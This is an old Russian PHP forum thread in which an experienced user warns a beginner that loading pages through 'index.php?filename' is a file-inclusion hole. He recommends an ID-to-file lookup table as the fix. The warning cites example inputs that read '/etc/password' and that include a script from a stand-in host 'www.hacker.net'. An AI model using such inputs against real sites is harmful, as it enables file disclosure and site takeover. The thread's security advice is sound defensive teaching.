Модераторы: skyboy, MoLeX, Aliance, ksnk

Поиск:

Ответ в темуСоздание новой темы Создание опроса
> Проблемма с PHP 4 
:(
    Опции темы
Sattu
Дата 17.8.2002, 04:52 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 133
Регистрация: 7.8.2002
Где: Західна Україна

Репутация: 3
Всего: 4



Снова не то...

Ты свой сайт как админиш? Руками или автоматизировано (скриптом через бровсер), как добавляеш например новую статью или новый раздел в своем движке. Меня не интересуют куски кода, мне интересно услышать (в смысле увидеть :) ) это словами. Тоесть приблизительно так:
1) Переписываю или чтото добавляю в шаблон/скрипт(или во все скрипты)...
2) Отмечаю в браузере на спец странице что-то там (в смысле флажок и т.д.), пишу название статьи/раздела, указываю файл со статьей/разделом и нажемаю кнопочку Добавить или какуюто другую...
3) ......

PS. Извени если не так объяснил.
-----------------------------------------------------

Насчет движка.

Разрабатывать скрипты таким макаром - большая дыра в безопасности не только сервера на каком ты хостишся, но и, что самое главное, для твоего сайта.
Тоесть я так понимаю ссылки у тебя приблизительно такого вида: ...index.php?menu.php, но если ктото напишет index.php?/etc/password что он увидит? Правильно, хеши всех паролей. Но можно пойти дальше и написать ...index.php?www.hacker.net/script.php, чем это грозит? Правильно, чел делает с твоим сайтом что угодно, в зависимости от его интеллекта и злобости. И этот список можна продолжать до бесконечности...
Как от этого спастись? Очень просто... Сделай линки приблизительно такими: ...index.php?id=12. А где-то в каком-то файле или в БД сделай таблицу, где числу будет отвечать УРЛ нужной статьи.
Пример файла с таблицей:
Код

1|article1.php
2|article2.php
 ..........

Тоесть по шаблону id|URL, шаблон какой себе выбереш (придумаеш) такой и будет.
Даже если кто-то и угадает/узнает название файла и просмотрет его в бровсере ничего страшного не будет :) .

Хотел что-то еще написать, да забыл что :) ... Но как только вспомню - сразу же и напишу.

PS. Если есть есть другие вопросы или этот не совсем понятен буду рад помочь.
PS. Сори за мой русский... Лет 7 не общался (не писал, не говорил, но читал :) ) на русском... Только последних полгода что-то пописываю ...
--------------------
тссссс.... «ЖЖ»
PM WWW ICQ AOL   Вверх
Dexter
Дата 18.8.2002, 00:48 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Эксперт
***


Профиль
Группа: Экс. модератор
Сообщений: 1562
Регистрация: 2.7.2002
Где: Москва, Бирюлево

Репутация: нет
Всего: 4



Цитата(Sattu @ 16.8.2002, 21:52)

Цитата
Ты свой сайт как админиш?


Делаю статью (без HEAD BODY etc) сохраняю article.php на главной странице делаю ссылку index.php?article.php. Вот и все. Я знаю что это по ламерски, но я общаюсь с php всего неделю (даже хостинг найти не могу).

Спасибо за совет по поводу движка. Обязательно переделаю.

Цитата
PS. Сори за мой русский... Лет 7 не общался (не писал, не говорил, но читал :) ) на русском... Только последних полгода что-то пописываю ...


Русский у тебя нормальный у меня и то хуже.

Можешь мне че нить с хостингом посоветовать?


--------------------
The only thing you really know about me is...
...that's all you'll ever know
PM MAIL ICQ   Вверх
Sattu
Дата 18.8.2002, 04:44 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Шустрый
*


Профиль
Группа: Участник
Сообщений: 133
Регистрация: 7.8.2002
Где: Західна Україна

Репутация: 3
Всего: 4



Цитата

Можешь мне че нить с хостингом посоветовать?


Вот насчет этого я никакого совета дать не могу... Хостюсь я или у друзей, или в универе.
--------------------
тссссс.... «ЖЖ»
PM WWW ICQ AOL   Вверх
Ответ в темуСоздание новой темы Создание опроса
Правила форума "PHP"
Aliance
IZ@TOP
skyboy
SamDark
MoLeX

Новичкам:

  • PHP редакторы собираются и обсуждаются здесь
  • Электронные книги по PHP, документацию можно найти здесь
  • Интерпретатор PHP, полную документацию можно скачать на PHP.NET

Важно:

  • Не брезгуйте пользоваться тегами [code=php]КОД[/code] для повышения читабельности текста/кода.
  • Перед созданием новой темы воспользуйтесь поиском и загляните в FAQ
  • Действия модераторов можно обсудить здесь

Внимание:

  • Темы "ищу скрипт", "подскажите скрипт" и т.п. будут переноситься в форум "Web-технологии"
  • Темы с именами: "Срочно", "помогите", "не знаю как делать" будут УДАЛЯТЬСЯ

Если Вам понравилась атмосфера форума, заходите к нам чаще! С уважением, IZ@TOP, skyboy, SamDark, MoLeX, awers.

 
1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей)
0 Пользователей:
« Предыдущая тема | PHP: Общие вопросы | Следующая тема »


 




[ Время генерации скрипта: 0.1145 ]   [ Использовано запросов: 21 ]   [ GZIP включён ]


Реклама на сайте     Информационное спонсорство

 
По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности     Powered by Invision Power Board(R) 1.3 © 2003  IPS, Inc.